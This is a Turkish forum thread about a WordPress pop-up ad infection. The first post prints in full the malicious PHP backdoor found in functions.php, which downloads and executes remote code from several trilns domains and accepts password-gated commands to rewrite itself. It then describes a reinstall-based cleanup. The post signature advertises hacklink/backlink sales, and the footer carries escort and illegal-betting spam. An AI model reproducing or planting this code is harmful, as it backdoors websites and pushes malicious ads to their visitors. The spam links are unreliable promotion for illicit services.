Konu Bilgileri
Konu: Wordpress Malware Hakkında Yazar: G3nzo
Okunma: 225 Yorum: 1
Konuyu Okuyanlar: 1 Ziyaretçi
Konuyu Oyla:
  • Derecelendirme: 0/5 - 0 oy
  • 1
  • 2
  • 3
  • 4
  • 5

#1
Öncelikle merhaba uzun zamandır yokum ancak bugun bir sorunla karşılaştım araştırdım ancak genel olarak geçici gözümler sunulmuş sorun 
Wordpress Pop-up Reklam Virüsü kısaca siz farkında olmadan arkaplanda çalışıyor siz hariç websitenize giriş yapan kişilerin tarayıcıda reklam gibi açılıyor.
Bulaştıgını nasıl anlıyoruz.

function.php ye gelip aşşagıdaki kodarı görüyoruz
 
Kod:
<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '22222218de5c35ff3a0f0ccadc0e1111'))
{
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{





case 'change_domain';
if (isset($_REQUEST['newdomain']))
{
if (!empty($_REQUEST['newdomain']))
{
                                                                           if ($file = @file_get_contents(__FILE__))
                                                                    {
                                                                                                 if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
                                                                                                             {

                                                                           $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
                                                                           @file_put_contents(__FILE__, $file);
                           print "true";
                                                                                                             }


                                                                    }
}
}
break;

case 'change_code';
if (isset($_REQUEST['newcode']))
{
if (!empty($_REQUEST['newcode']))
{
                                                                           if ($file = @file_get_contents(__FILE__))
                                                                    {
                                                                                                 if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
                                                                                                             {

                                                                           $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
                                                                           @file_put_contents(__FILE__, $file);
                           print "true";
                                                                                                             }


                                                                    }
}
}
break;
default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
}
die("");
}








$div_code_name = "wp_vcd";
$funcfile      = __FILE__;
if(!function_exists('theme_temp_setup')) {
    $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
    if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
        
        function file_get_contents_tcurl($url)
        {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
            $data = curl_exec($ch);
            curl_close($ch);
            return $data;
        }
        
        function theme_temp_setup($phpCode)
        {
            $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
            $handle   = fopen($tmpfname, "w+");
           if( fwrite($handle, "<?php\n" . $phpCode))
   {
   }
else
{
$tmpfname = tempnam('./', "theme_temp_setup");
            $handle   = fopen($tmpfname, "w+");
fwrite($handle, "<?php\n" . $phpCode);
}
fclose($handle);
            include $tmpfname;
            unlink($tmpfname);
            return get_defined_vars();
        }
        

$wp_auth_key='e121c363676c86e24b37374a839fbb37';
        if (($tmpcontent = @file_get_contents("http://www.trilns.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.trilns.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {

            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
                
            }
        }
        
        
        elseif ($tmpcontent = @file_get_contents("http://www.trilns.pw/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
                
            }
        } 
        elseif ($tmpcontent = @file_get_contents("http://www.trilns.top/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
                
            }
        }
elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
           
        } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent)); 

        } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent)); 

        } 
        
        
        
        
        
    }
}

//$start_wp_theme_tmp



//wp_tmp


//$end_wp_theme_tmp
Kod:
     
Aynı zamanda  
/wp-includes/ klasörün de wp-tmp.php ve wp-vcd.php  isimli iki dosya yer alıyor.

Çözüme gelicek olursak hep function.php yukarıdaki kodarı ve iki dosyayı silin yeter yazmışlar ancak yeterli değil her yere yayılmış ve silince muhtemelen .htaccess yüzünden 2 dk sonra tekrar geliyor nedeni kullanılan tema ve eklentiler olabilir tam bilmiyorum.

Ben nasıl çözüm buldum Veritabanı yedeğim vardı resimler kısmını ayırıp tüm Wordpress dosyalarını sildim ardından yenisi ile değiştirip kullandıgım temanın yenisini ekledim ve yine function.php izinlerini sınırlandırdım ilk tarattığım zaman 60 tane Malware görünen web sitesi şimdi tarattıgımda temiz görünüyor.
dediklerimi yaptıkdan sonra muhtemelen sorununuz düzelmş olucak her ihtimale karşı diger şifrelerinizide değiştirin.
hacklink/backlink uygun fiyatlar
Pagerank 3 : 5 Tl
Pagerank 4 : 10 Tl
Pagerank 5 : 30 Tl
Pagerank 6 : 50 Tl
Pagerank 7 : 70 Tl
Pagerank 8 : 100 Tl
+ Emekli reyiz Açık Ağızlı Gülümseme
Ara
Cevapla
#2
Hoşgeldin bro umarım sık sık görüşürüz eski günlerdeki ortam ve tat olmasa da bu forumu yine düzende tutacağız.
Ara
Cevapla


Wordpress Malware Hakkında Konusu Araçları
Direk Link
HTML Link
BBCode Link
Paylaş


Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  WordPress Sitesi Olanlar Bu Eklentiyi Kurmalı Kzsg 6 1,337 23.12.2019, Saat:13:15
Son Yorum: hayrom222
  FAALİYETLERİM HAKKINDA DUYURUM ROOTY 0 1,104 07.02.2019, Saat:10:32
Son Yorum: ROOTY
  Malwarebytes-Anti Malware (PRO) Nefer 0 1,010 18.12.2012, Saat:07:36
Son Yorum: Nefer


mersin escort bayan | mersin escort | escort mersin | izmir escort izmir escort alanya escort canlı bahis siteleri tipobet bahis siteleri kaçak iddaa canlı bahis mobilbahis deneme bonusu deneme bonusu bodrum escort kuşadası escort türkçe altyazılı porno kiralık bahis sitesi
izmir escort